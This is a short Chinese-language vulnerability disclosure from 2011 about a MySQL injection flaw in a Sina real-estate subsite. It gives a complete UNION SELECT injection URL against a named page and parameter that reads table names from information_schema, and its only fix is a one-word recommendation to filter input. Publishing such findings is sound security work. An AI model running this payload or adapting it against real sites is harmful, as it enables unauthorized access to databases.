- 首页 > 安全 > 网站安全 > 正文
新浪房产分站存在SQL注入漏洞及修复
- 2011-01-12 10:56:55
个评论
-
收藏
我要投稿
详细说明:新浪房产分站存在MySQL注入
漏洞漏洞证明:
http://supports.house.sina.com.cn/decor/brand/brand.php?bid=17%20and%201=2%20union%20select%201,2,3,4,5,6,7,8,9,10,11,table_name,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30%20from%20information_schema.tables%20where%20table_schema=0x737570706F727473686F757365%20limit%20132,1--
修复方案:过滤
- 上一篇:Awstats统计权限分配不当导致爆路径及修复
- 下一篇:TinyBB 1.2 SQL Injection Vulnerability